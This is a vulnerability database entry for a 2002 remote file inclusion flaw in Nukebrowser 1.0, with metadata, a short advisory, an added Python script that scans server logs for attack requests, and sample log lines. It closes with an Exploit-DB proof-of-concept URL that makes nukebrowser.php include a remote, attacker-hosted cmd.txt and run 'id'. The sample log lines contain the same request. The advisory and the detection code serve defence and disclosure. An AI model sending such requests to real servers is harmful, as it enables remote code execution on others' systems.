Vendor: Nukebrowser
By: SecurityFocus
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: Nukebrowser
Affected Version From: Nukebrowser 1.0
Affected Version To: Nukebrowser 1.0
Patch Exists: YES
Related CWE: CVE-2002-1490
CPE: o:nukebrowser:nukebrowser:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

Nukebrowser Remote File Inclusion Vulnerability

Nukebrowser is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the nukebrowser.php script file. Under some circumstances, it is possible for remote attackers to influence the include path for 'cmd.txt' to point to an external file on a remote server by manipulating some URI parameters.

Mitigation:

Upgrade to the latest version of Nukebrowser
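
To check whether this request pattern has already been seen, the following added example (not part of the original advisory or of Nukebrowser) scans web server access logs for requests to nukebrowser.php whose filnavn or filhead parameter holds a remote URL. The combined log format, the sample lines, and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script and parameters named in the advisory's example request.
SCRIPT = "nukebrowser.php"
WATCHED_PARAMS = {"filnavn", "filhead"}
# A value that starts with a URL scheme ("http://", "ftp://") or a bare "//".
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)
# Client, request target and status from a "combined" format log line (assumed format).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded schemes are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_rfi_attempts(log_lines):
    """Return (client, status, param, value) for each suspicious parameter."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/" + SCRIPT):
            continue
        # parse_qsl decodes once; fully_decode handles further encoding layers.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(value)
            if name.lower() in WATCHED_PARAMS and REMOTE_RE.match(value):
                hits.append((client, int(status), name.lower(), value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2003:10:00:00 +0000] "GET /nukebrowser.php?filnavn=docs/readme.txt HTTP/1.0" 200 512',
    '198.51.100.7 - - [01/Jan/2003:10:01:00 +0000] "GET /nukebrowser.php?filnavn=http://www.site.com&filhead=http://files.example/cmd.txt&cmd=id HTTP/1.0" 200 90',
    '198.51.100.7 - - [01/Jan/2003:10:02:00 +0000] "GET /nukebrowser.php?filhead=hTTp%253A%252F%252Ffiles.example%252Fcmd.txt HTTP/1.0" 200 90',
    '192.0.2.10 - - [01/Jan/2003:10:03:00 +0000] "GET /index.php?filhead=http://files.example/x HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

A hit with a 200 status on a host still running the affected version is worth following up in the server's outbound connection logs, since a successful include requires the server to fetch the remote file.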

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6731/info

http://[victim]/nukebrowser.php?filnavn=http://www.site.com&filhead=http://[web hosting]/cmd.txt&cmd=id